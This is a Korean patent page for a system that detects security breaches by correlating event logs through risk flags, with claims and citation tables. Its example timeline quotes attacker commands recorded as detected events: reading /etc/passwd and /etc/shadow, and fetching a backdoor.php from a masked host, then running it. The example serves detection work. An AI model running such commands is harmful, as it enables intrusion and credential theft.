CVE와 정보보호지침, 관리자의 경험 등을 참조하여 위험도 플래그를 결정할 수 있는데, 이외에도 다양한 기준에 따라서 위험도 플래그를 선택할 수 있다. 본 발명의 분석시스템(100)에서는 이러한 기준에 따라 등록되어진 이벤트탐지룰DB(112)를 기준으로 하여 위험도측정부(110)가 이벤트로그에 대한 연계로그유형을 결정한다. 그리고, 연계분석부(108)는 정해진 연계로그유형에 따라 연계분석을 결정하고, 보안이벤트의 정규화 컬럼 "LINKED_LOGTYPE"을 참조하여 연계분석 대상이 되는 이벤트로그를 추출한다.(S110)
연계분석부(108)는 연계로그유형에 따라 이벤트로그에 대한 연계분석을 실시하고, 그 결과에 따른 알람을 관리자단말기(300)에 전달한다.(S112)
탐지대상이 되는 이벤트로그에 대한 위험도 플래그가 0일 때는 연계분석을 실시하지 않는다.
위험도 플래그가 1일 때는 해당 보안 이벤트로그에서 SRC(보안 이벤트에서 출발지의 IP)의 값을 추출하여 정규화 데이터에 포함된 컬럼 "LINKED_LOGTYPE"에 정의되어진 보안이벤트의 SRC와 DST에 대한 OR 연산 연계분석을 실시한다.
위험도 플래그가 2일 때는 해당 보안 이벤트로그에서 DST(보안 이벤트에서 목적지의 IP)의 값을 추출하여 정규화 데이터에 포함된 컬럼 "LINKED_LOGTYPE"에 정의되어진 보안이벤트의 SRC와 DST에 대한 OR 연산 연계분석을 실시한다.
위험도 플래그값이 3일 때는 해당 보안 이벤트로그에서 SRC 및 DST값을 함께 추출하여 정규화 데이터에 포함된 컬럼 "LINKED_LOGTYPE"에 정의되어진 보안이벤트를 대상으로 SRC와 DST에 대한 AND 연산 연계분석을 실시한다.
연계분석부(108)는 연계분석 결과를 JSON 파일 형태로 변환하여 통합로그DB(114)에 저장한다.
도 5a와 5b는 이벤트로그에 대한 연계분석을 한 결과를 나타낸 테이블이다.
도 5a와 5b를 참조하면, 침입탐지/차단시스템 보안이벤트(detectionlogs)의 SRC(출발지 IP 주소) 125.141.XX.XX(가칭)에서 DST(목적지 IP 주소) 218.15.XX.XX(가칭) 로 이벤트로그가 탐지되었다. 그리고 이벤트탐지룰DB(112)에 저장된 위험도 플래그는 2로 결정되었기 때문에 정규화된 이벤트로그에서 DST를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그의 SRC와 DST를 OR 연산하여 연계분석을 수행하였다.
아래의 표 3은 시간 순서대로 도 5a와 5b의 보안 이벤트를 분석한 결과를 설명한 내용이다.
| INDEX | TIMELINE | 보안이벤트 로그 | 탐지 내용 설명 |
| 1 | 2015년10월01일 오전11시10분24초 |
detectionlogs | 125.141.XX.XX에서 218.15.XX.XX 시스템을 대상으로 SQL Injection 공격탐지 위험도 플래그 결정: 위험도 플래그 값이 2로 연계분석 대상으로 결정 정규화 컬럼 LINKED_LOGTYPE에 선언되어진 이벤트로그를 대상으로 연계분석을 실시 |
| 2 | 2015년10월01일 오전11시10분26초 |
waflogs | 125.141.XX.XX에서 218.15.XX.XX 시스템을 대상으로 SQL Injection 공격탐지 |
| 3 | 2015년10월01일 오전11시11분26초 |
securelogs | 125.141.XX.XX에서 218.15.XX.XX 시스템 SSH 접근 시도 실패 탐지 |
| 4 | 2015년10월01일 오전11시11분27초 |
securelogs | 125.141.XX.XX에서 218.15.XX.XX 시스템 SSH 접근 시도 실패 탐지 |
| 5 | 2015년10월01일 오전11시11분29초 |
securelogs | 125.141.XX.XX에서 218.15.XX.XX 시스템 SSH 접근 시도 실패 탐지 |
| 6 | 2015년10월01일 오전11시11분29초 |
securelogs | 125.141.XX.XX에서 218.15.XX.XX 시스템 SSH 접근 시도 실패 탐지 |
| 7 | 2015년10월01일 오전11시11분31초 |
securelogs | 125.141.XX.XX에서 218.15.XX.XX 시스템 SSH 접근 시도 실패 탐지 |
| 8 | 2015년10월01일 오전11시11분33초 |
securelogs | 125.141.XX.XX에서 218.15.XX.XX 시스템 SSH 접근 성공 탐지 |
| 9 | 2015년10월01일 오전11시20분32초 |
cmdlogs | 125.141.XX.XX에서 218.15.XX.XX 시스템으로 접속한 사용자가 vim /etc/passwd 명령 수행을 통해 파일 열람 이력 탐지 |
| 10 | 2015년10월01일 오전11시20분40초 |
cmdlogs | 125.141.XX.XX에서 218.15.XX.XX 시스템으로 접속한 사용자가 vim /etc/shadows 명령 수행을 통해 파일 열람 이력 탐지 |
| 11 | 2015년10월01일 오전11시20분55초 |
cmdlogs | 125.141.XX.XX에서 218.15.XX.XX 시스템으로 접속한 사용자가 vim /etc/hosts 명령 수행을 통해 파일 열람 이력 탐지 |
| 12 | 2015년10월01일 오전11시21분05초 |
cmdlogs | 125.141.XX.XX에서 218.15.XX.XX 시스템으로 접속한 사용자가 wget http:xxx.xx.xx/backdoor.php 다운로드 명령 수행 탐지 |
| 13 | 2015년10월01일 오전11시21분06초 |
httpdlogs | 218.15.XX.XX 시스템에서 http:xxx.xx.xx/backdoor.php 파일이 다운로드 패킷 보안 이벤트 탐지 |
| 14 | 2015년10월01일 오전11시21분56초 |
cmdlogs | 125.141.XX.XX에서 218.15.XX.XX 시스템으로 접속한 사용자가 mv backdoor.php /tmp/system.php 명령 수행 탐지 |
| 15 | 2015년10월01일 오전11시22분01초 |
cmdlogs | 125.141.XX.XX에서 218.15.XX.XX 시스템으로 접속한 사용자가 chmod 777 /tmp/system.php; php /tmp/system.php 명령 수행 탐지 |
| 16 | 2015년10월01일 오전11시22분05초 |
dnslogs | 218.15.XX.XX 시스템에서 악성사이트로 추정되는 도메인 질의 탐지 |
| 17 | 2015년10월01일 오전11시22분06초 |
dnslogs | 218.15.XX.XX 시스템에서 악성사이트로 추정되는 도메인 질의 탐지 |
| 18 | 2015년10월01일 오전11시22분07초 |
dnslogs | 218.15.XX.XX 시스템에서 악성사이트로 추정되는 도메인 질의 탐지 |
| 19 | 2015년10월01일| 오전11시22분47초 |
infectedlogs | 218.15.XX.XX 시스템에서 백신 악성코드 탐지 |
| 20 | 2015년10월01일 오전11시24분01초 |
patchlogs | 218.15.XX.XX 시스템에서 SSL 취약점 탐지 |
| 21 | 2015년10월01일 오전11시24분12초 |
patchlogs | 218.15.XX.XX 시스템에서 BASH SHELL 취약점 탐지 |
표 3에 기록된 21단계의 보안 이벤트를 요약하면, 침입탐지/차단시스템 이벤트로그(detectionlogs)에 SQL Injection 공격시도가 탐지되었으며, 해당 단일이벤트의 위험도 플래그(2)에 따라 연계분석을 실시한 결과, 웹 방화벽 이벤트로그(waflog), 리눅스 SSH 이벤트로그(securelogs), 리눅스 시스템 명령 수행 이벤트로그(cmdlogs), 웹을 통한 실행파일 다운르도 이벤트로그(httpdlogs), 시스템 도메인 쿼리 이벤트로그(dnslogs), 악성코드 감염 이벤트로그(infectedlogs), 시스템 패치 이벤트로그(pathclogs)가 다수 연계분석 되었음을 알 수 있다.
따라서, 특정 IP에서 발생한 보안 침해의 흐름 및 위치와 특정 시스템의 보안 위협(Threat), 취약성(Vulnerability)을 연계분석을 통하여 빠르게 확인할 수 있다.
만약 특정 보안 이벤트로그의 위험도 플래그가 1인 경우에는 SRC를 기준으로 연계분석을 실시하여 관리자에게 제공할 수 있다. 또한 위험도 플래그가 3인 경우에는 SRC와 DST를 동시에 기준으로 삼아 연계분석을 실시한다.
그러나 위험도 플래그에 따른 연계분석 필드의 선택 기준은 시스템의 특성에 따라 달라질 수 있다. 즉, 위험도 플래그가 2일 경우에 SRC를 기준으로 연계분석을 실시하고, 위험도 플래그가 1일 경우에 DST를 기준으로 연계분석을 실시하도록 설정할 수도 있을 것이다. 이외에도 새로운 위험도 플래그에 따라 연계분석 조건식을 설정할 수도 있을 것이다.
연계분석의 결과는 통합로그DB(114)에 저장된다.(S114)
따라서 단일 보안 이벤트로는 제한적인 침해 탐지, 침해 인과관계, 위협, 취약성 등에 대한 연계분석 결과를 통하여 쉽게 보안 침해 탐지가 가능하며, 타임라인으로 이벤트 발생 순서를 정렬함으로써 관리자가 침해의 시도 과정을 쉽게 확인을 할 수 있다.
또한 보안 침해의 분석에 소모되는 인적, 물적, 시간적 자원을 절감할 수 있다.
이상 첨부된 도면을 참조하여 본 발명의 바람직한 실시예를 설명하였지만, 상술한 본 발명의 기술적 구성은 본 발명이 속하는 기술 분야의 당업자가 본 발명의 그 기술적 사상이나 필수적 특징을 변경하지 않고서 다른 구체적인 형태로 실시될 수 있다는 것을 이해할 수 있을 것이다. 그러므로 이상에서 기술한 실시예들은 모든 면에서 예시적인 것이며 한정적인 것이 아닌 것으로서 이해되어야 하고, 본 발명의 범위는 상기 상세한 설명보다는 후술하는 특허청구범위에 의하여 나타내어지며, 특허청구범위의 의미 및 범위 그리고 그 등가 개념으로부터 도출되는 모든 변경 또는 변형된 형태가 본 발명의 범위에 포함되는 것으로 해석되어야 한다.
100 : 분석시스템 102 : 통합로그수집부
104 : 로그정규화부 106 : 단일이벤트탐지부
108 : 연계분석부 110 : 위험도측정부
112 : 이벤트탐지룰DB 114 : 통합로그DB
200 : 로컬단말기 202 : 로컬로그수집부
300 : 관리자단말기
104 : 로그정규화부 106 : 단일이벤트탐지부
108 : 연계분석부 110 : 위험도측정부
112 : 이벤트탐지룰DB 114 : 통합로그DB
200 : 로컬단말기 202 : 로컬로그수집부
300 : 관리자단말기
Claims (8)
- 로컬단말기(200)에서 발생하는 보안 이벤트를 분석하여 관리자에게 제공하는 보안침해 분석시스템으로서,
상기 로컬단말기(200)에 설치된 로컬로그수집부(202)가 수집하여 전송한 이벤트로그를 수신하여 통합로그DB(114)에 저장하는 통합로그수집부(102)와;
상기 통합로그수집부(102)가 수신한 상기 이벤트로그를 정규화하여 JSON(JavaScript Object Notation) 파일 형태로 변환하고, 정규화된 이벤트로그를 상기 통합로그DB(114)에 저장하는 로그정규화부(104)와;
이벤트탐지룰DB(112)에 저장된 탐지룰을 참조하여 상기 정규화된 이벤트로그를 분석하고, 상기 이벤트로그에 보안침해 가능성이 있는 이벤트 기록이 포함되어 있는지를 분석하는 단일이벤트탐지부(106)와;
상기 단일이벤트탐지부(106)의 분석 대상이 되는 이벤트로그에 부여된 위험도 플래그가 소정의 값일 경우, 복수의 이벤트로그를 연계하여 분석하는 연계분석부(108)와;
상기 이벤트탐지룰DB(112)에 저장된 탐지룰의 위험도 플래그 컬럼을 참조하여 탐지대상이 되는 상기 이벤트로그의 연계로그유형을 결정하는 위험도측정부(110);를 포함하며,
상기 정규화된 이벤트로그는 "TIME, TYPE, HOST, SRC, DST, CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004, LINKED_LOGTYPE"의 필드로 된 데이터로 구성되며,
TIME은 보안이벤트의 탐지시각을 unixtime 형식으로 기록한 것이며, TYPE은 보안 이벤트의 유형이며, HOST는 보안 이벤트의 탐지가 이루어진 센서의 IP 주소 또는 호스트 네임이며, SRC는 보안 이벤트에서 출발지의 IP이며, DST는 보안 이벤트에서 목적지의 IP이며, CONTENTS_001 내지 CONTENTS_004는 보안 이벤트에서 발생하는 상세 내용이며, LINKED_LOGTYPE은 연계분석을 수행할 이벤트로그의 대상을 정의한 것으로서 단일 이벤트 발생 시점을 전후하여 일정 시간동안 일정 임계치 이상 보안 이벤트가 발생한 이벤트로그이며,
상기 연계분석부(108)는
탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 1인 경우, 상기 이벤트로그에서 SRC를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 OR 연산에 의한 연계분석을 실시하며,
탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 2인 경우, 상기 이벤트로그에서 DST를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 OR 연산에 의한 연계분석을 실시하며,
탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 3인 경우, 상기 이벤트로그에서 SRC와 DST를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 AND 연산에 의한 연계분석을 실시하는 것을 특징으로 하는, 보안 이벤트로그 분석을 통한 보안침해 분석시스템. - 삭제
- 삭제
- 제1항에 있어서,
상기 단일이벤트탐지부(106)는 상기 정규화된 이벤트로그에 포함된 데이터 중에서
상기 CONTENTS_001 내지 CONTENTS_004에 대하여 상기 이벤트탐지룰DB(112)에서 참조하는 키워드를 AND, OR, NOT 연산자 조합을 통하여 패턴 매칭하는 컨텐츠 기반 탐지와,
상기 HOST와 상기 SRC, 상기 DST에 대하여 상기 이벤트탐지룰DB(112)에서 참조하는 키워드를 AND, OR, NOT 연산자 조합을 패턴 매칭하는 호스트 기반 탐지 중 하나의 방법을 사용하는 것을 특징으로 하는, 보안 이벤트로그 분석을 통한 보안침해 분석시스템. - 제1항 또는 제4항의 보안침해 분석시스템을 이용한 보안침해 분석방법으로서,
로컬단말기(200)에 설치된 로컬로그수집부(202)가 이벤트로그를 수집하여 전송하면, 통합로그수집부(102)가 수신하여 통합로그DB(114)에 저장하는 제1단계와;
상기 통합로그수집부(102)가 수신한 상기 이벤트로그를 로그정규화부(104)가 정규화하여 JSON(JavaScript Object Notation) 파일 형태로 변환하고, 정규화된 이벤트로그를 상기 통합로그DB(114)에 저장하는 제2단계와;
단일이벤트탐지부(106)가 이벤트탐지룰DB(112)에 저장된 탐지룰을 참조하여 상기 정규화된 이벤트로그를 분석하고, 상기 이벤트로그에 보안침해 가능성이 있는 이벤트 기록이 포함되어 있는지를 분석하는 제3단계와;
위험도측정부(110)가 상기 이벤트탐지룰DB(112)에 저장된 탐지룰의 위험도 플래그 컬럼을 참조하여 탐지대상이 되는 상기 이벤트로그의 연계로그유형을 결정하는 제4단계와;
연계분석부(108)가 상기 단일이벤트탐지부(106)의 분석 대상이 되는 이벤트로그에 대한 위험도 플래그가 소정의 값일 경우, 복수의 이벤트로그를 연계하여 분석하는 제5단계;를 포함하며,
상기 정규화된 이벤트로그는 "TIME, TYPE, HOST, SRC, DST, CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004, LINKED_LOGTYPE"의 필드로 된 데이터로 구성되며,
TIME은 보안이벤트의 탐지시각을 unixtime 형식으로 기록한 것이며, TYPE은 보안 이벤트의 유형이며, HOST는 보안 이벤트의 탐지가 이루어진 센서의 IP 주소 또는 호스트 네임이며, SRC는 보안 이벤트에서 출발지의 IP이며, DST는 보안 이벤트에서 목적지의 IP이며, CONTENTS_001 내지 CONTENTS_004는 보안 이벤트에서 발생하는 상세 내용이며, LINKED_LOGTYPE은 연계분석을 수행할 이벤트로그의 대상을 정의한 것으로서 단일 이벤트 발생 시점을 전후하여 일정 시간동안 일정 임계치 이상 보안 이벤트가 발생한 이벤트로그이며,
상기 연계분석부(108)는
탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 1인 경우, 상기 이벤트로그에서 SRC를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 OR 연산에 의한 연계분석을 실시하며,
탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 2인 경우, 상기 이벤트로그에서 DST를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 OR 연산에 의한 연계분석을 실시하며,
탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 3인 경우, 상기 이벤트로그에서 SRC와 DST를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 AND 연산에 의한 연계분석을 실시하는 것을 특징으로 하는, 보안 이벤트로그 분석을 통한 보안침해 분석방법. - 삭제
- 삭제
- 제5항에 있어서,
상기 단일이벤트탐지부(106)는 상기 정규화된 이벤트로그에 포함된 데이터 중에서
상기 CONTENTS_001 내지 CONTENTS_004에 대하여 상기 이벤트탐지룰DB(112)에서 참조하는 키워드를 AND, OR, NOT 연산자 조합을 통하여 패턴 매칭하는 컨텐츠 기반 탐지와,
상기 HOST와 상기 SRC, 상기 DST에 대하여 상기 이벤트탐지룰DB(112)에서 참조하는 키워드를 AND, OR, NOT 연산자 조합을 패턴 매칭하는 호스트 기반 탐지 중 하나의 방법을 사용하는 것을 특징으로 하는, 보안 이벤트로그 분석을 통한 보안침해 분석방법.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| KR1020150161973A KR101788410B1 (ko) | 2015-11-18 | 2015-11-18 | 보안 이벤트로그 분석을 통한 보안침해 분석시스템 및 분석방법 |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| KR1020150161973A KR101788410B1 (ko) | 2015-11-18 | 2015-11-18 | 보안 이벤트로그 분석을 통한 보안침해 분석시스템 및 분석방법 |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| KR20170058140A KR20170058140A (ko) | 2017-05-26 |
| KR101788410B1 true KR101788410B1 (ko) | 2017-10-19 |
Family
ID=59052141
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| KR1020150161973A Active KR101788410B1 (ko) | 2015-11-18 | 2015-11-18 | 보안 이벤트로그 분석을 통한 보안침해 분석시스템 및 분석방법 |
Country Status (1)
| Country | Link |
|---|---|
| KR (1) | KR101788410B1 (ko) |
Cited By (1)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| KR20240162797A (ko) | 2023-05-09 | 2024-11-18 | 한전케이디엔주식회사 | 위협헌팅 기반 클라우드 침해사고 탐지 및 대응 시스템 및 그 방법 |
Families Citing this family (9)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| KR102038926B1 (ko) * | 2018-11-17 | 2019-11-15 | 한국과학기술정보연구원 | 공격자 선정 장치 및 공격자 선정 장치의 동작 방법 |
| KR102215228B1 (ko) | 2020-04-13 | 2021-02-10 | 서울과학기술대학교 산학협력단 | 로그 데이터 분석을 통한 프로그램의 중복 접근 패턴 탐지 시스템 및 그 제거 방법 |
| KR102158784B1 (ko) * | 2020-05-14 | 2020-09-22 | 주식회사 쿼리시스템즈 | 이기종 보안 장비와 연동하는 보안위협 자동 차단 시스템 |
| CN113592690B (zh) * | 2021-07-30 | 2024-03-29 | 卡斯柯信号有限公司 | 一种基于数据库模型的危害管理方法 |
| KR102761719B1 (ko) | 2021-10-18 | 2025-02-05 | 주식회사 페스카로 | 보안 이벤트 발생 시간 추정 방법 및 시스템 |
| CN114254327A (zh) * | 2021-12-20 | 2022-03-29 | 奇安信科技集团股份有限公司 | 操作系统漏洞检测方法、装置、存储介质及电子设备 |
| KR102426889B1 (ko) * | 2022-01-05 | 2022-07-29 | 주식회사 이글루코퍼레이션 | 대용량 이벤트 로그에 대한 로그 타입별 데이터 분석 처리 장치, 방법 및 프로그램 |
| CN114826727B (zh) * | 2022-04-22 | 2024-05-07 | 南方电网数字电网研究院有限公司 | 流量数据采集方法、装置、计算机设备、存储介质 |
| CN116232751A (zh) * | 2023-03-16 | 2023-06-06 | 中国华能集团有限公司北京招标分公司 | 一种安全告警分析方法 |
-
2015
- 2015-11-18 KR KR1020150161973A patent/KR101788410B1/ko active Active
Cited By (1)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| KR20240162797A (ko) | 2023-05-09 | 2024-11-18 | 한전케이디엔주식회사 | 위협헌팅 기반 클라우드 침해사고 탐지 및 대응 시스템 및 그 방법 |
Also Published As
| Publication number | Publication date |
|---|---|
| KR20170058140A (ko) | 2017-05-26 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| KR101788410B1 (ko) | 보안 이벤트로그 분석을 통한 보안침해 분석시스템 및 분석방법 | |
| JP6863969B2 (ja) | 低信頼度のセキュリティイベントによるセキュリティインシデントの検出 | |
| CN111490970A (zh) | 一种网络攻击的溯源分析方法 | |
| KR101689298B1 (ko) | 보안이벤트 자동 검증 방법 및 장치 | |
| CN114598525A (zh) | 一种针对网络攻击的ip自动封禁的方法和装置 | |
| CN107295021B (zh) | 一种基于集中管理的主机的安全检测方法及系统 | |
| Wang et al. | NetSpy: Automatic generation of spyware signatures for NIDS | |
| US20200106791A1 (en) | Intelligent system for mitigating cybersecurity risk by analyzing domain name system traffic metrics | |
| Mualfah et al. | Network forensics for detecting flooding attack on web server | |
| US20030083847A1 (en) | User interface for presenting data for an intrusion protection system | |
| CN107733699B (zh) | 互联网资产安全管理方法、系统、设备及可读存储介质 | |
| KR101768079B1 (ko) | 침입탐지 오탐 개선을 위한 시스템 및 방법 | |
| WO2016121348A1 (ja) | マルウェア対策装置、マルウェア対策システム、マルウェア対策方法、及び、マルウェア対策プログラムが格納された記録媒体 | |
| CN114640548A (zh) | 一种基于大数据的网络安全感知和预警的方法及系统 | |
| US10897472B1 (en) | IT computer network threat analysis, detection and containment | |
| CN110868403B (zh) | 一种识别高级持续性攻击apt的方法及设备 | |
| CN113660115B (zh) | 基于告警的网络安全数据处理方法、装置及系统 | |
| Lee et al. | Sierra: Ranking anomalous activities in enterprise networks | |
| KR20130116418A (ko) | Ip 평판 분석 장치, 방법 및 컴퓨터 판독 가능한 기록 매체 | |
| KR101767591B1 (ko) | 침입탐지 오탐 개선을 위한 시스템 및 방법 | |
| Yang et al. | True attacks, attack attempts, or benign triggers? an empirical measurement of network alerts in a security operations center | |
| Kergl et al. | Detection of zero day exploits using real-time social media streams | |
| CN111355688A (zh) | 一种基于ai技术自动渗透、分析的核心方法及装置 | |
| KR101712462B1 (ko) | Ip 위험군 탐지 시스템 | |
| Raut | Log based intrusion detection system |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| A201 | Request for examination | ||
| PA0109 | Patent application |
Patent event code: PA01091R01D Comment text: Patent Application Patent event date: 20151118 |
|
| PA0201 | Request for examination | ||
| E902 | Notification of reason for refusal | ||
| PE0902 | Notice of grounds for rejection |
Comment text: Notification of reason for refusal Patent event date: 20170113 Patent event code: PE09021S01D |
|
| PG1501 | Laying open of application | ||
| E701 | Decision to grant or registration of patent right | ||
| PE0701 | Decision of registration |
Patent event code: PE07011S01D Comment text: Decision to Grant Registration Patent event date: 20170822 |
|
| PR0701 | Registration of establishment |
Comment text: Registration of Establishment Patent event date: 20171013 Patent event code: PR07011E01D |
|
| PR1002 | Payment of registration fee |
Payment date: 20171013 End annual number: 3 Start annual number: 1 |
|
| PG1601 | Publication of registration | ||
| PR1001 | Payment of annual fee |
Payment date: 20201012 Start annual number: 4 End annual number: 6 |
|
| PR1001 | Payment of annual fee |
Payment date: 20230220 Start annual number: 7 End annual number: 7 |
|
| PR1001 | Payment of annual fee |
Payment date: 20240304 Start annual number: 8 End annual number: 8 |
|
| PR1001 | Payment of annual fee |
Payment date: 20250109 Start annual number: 9 End annual number: 9 |